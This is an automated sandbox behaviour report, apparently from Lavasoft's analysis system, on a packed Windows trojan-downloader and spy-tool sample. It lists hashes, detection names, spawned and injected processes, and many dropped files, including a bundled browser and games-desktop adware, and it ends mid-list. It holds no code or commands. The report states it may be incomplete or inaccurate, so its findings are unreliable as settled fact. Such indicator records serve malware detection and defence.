Trojan-Downloader.Win32.Genome.tucb (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: db205e63f226072be250a9a94dfa3731
SHA1: 2f8b534c2e80100feb0721ce084e1b3de9e578ac
SHA256: 461fffce26e3757cab94c4b3f1a2c9a5966088033ea19324df9ce62fdf5411cb
SSDeep: 6144:Ge34/iec9Ys3cT44CWhU2DK9kr6WDRo7nBkBh 8u9uF4R6NRrXzdNGgMCzN72eOI:yiekG3bxrLo7SBh I4UNth0gL6eOI
Size: 342996 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Destiny Media
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
nsb27.tmp:1920
nst20.tmp:1040
nsh37.tmp:1376
nss2A.tmp:1600
nss2A.tmp:228
gmsd_re_005010082.exe:436
tasklist.exe:1920
tasklist.exe:1068
setup.exe:268
nsn4.tmp:224
taskkill.exe:484
taskkill.exe:220
wmic.exe:1524
amisid.exe:224
amisid.exe:1228
nsp1D.tmp:1376
%original file name%.exe:1704
nsd3C.tmp:1776
nsd3C.tmp:848
2835.exe:792
encrypt.exe:644
encrypt.exe:1796
encrypt.exe:1900
encrypt.exe:1484
upgmsd_re_005010082.exe:380
nsd33.tmp:432
nskA.tmp:1676
nsc14.tmp:1452
The SpyTool injects its code into the following process(es):
nsc43.tmp:1632
nsy18.tmp:1632
taskkill.exe:1632
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nsb27.tmp:1920 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2A.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (0 bytes)
The process nst20.tmp:1040 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse22.tmp (0 bytes)
The process nsh37.tmp:1376 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[2].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3A.tmp (6012 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (0 bytes)
The process nsc43.tmp:1632 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (102710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (3413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz48.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll (4152 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi45.tmp (0 bytes)
The process nss2A.tmp:1600 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (0 bytes)
The process nss2A.tmp:228 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2D.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp (0 bytes)
The process gmsd_re_005010082.exe:436 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\gmsd_re_005010082\1.20\cnf.cyl (269 bytes)
The process setup.exe:268 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin (0 bytes)
The process nsy18.tmp:1632 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1B.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1A.tmp (0 bytes)
The process nsn4.tmp:224 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj7.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process wmic.exe:1524 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
The process nsp1D.tmp:1376 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2835.exe (14988 bytes)
The process %original file name%.exe:1704 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (9771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
The process nsd3C.tmp:1776 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (3779 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp (0 bytes)
The process nsd3C.tmp:848 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-73DD7.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-QHO3I.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-F8943.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-FI91J.tmp (15278 bytes)
%Program Files%\gmsd_re_005010082\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-OHVJR.tmp (7433 bytes)
%Program Files%\gmsd_re_005010082\unins000.dat (29081 bytes)
%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp (4 bytes)
%Program Files%\gmsd_re_005010082\is-SLOUM.tmp (22284 bytes)
%Program Files%\gmsd_re_005010082\predm.exe (2321 bytes)
%Program Files%\gmsd_re_005010082\gamesdesktop_widget.exe (77294 bytes)
The SpyTool deletes the following file(s):
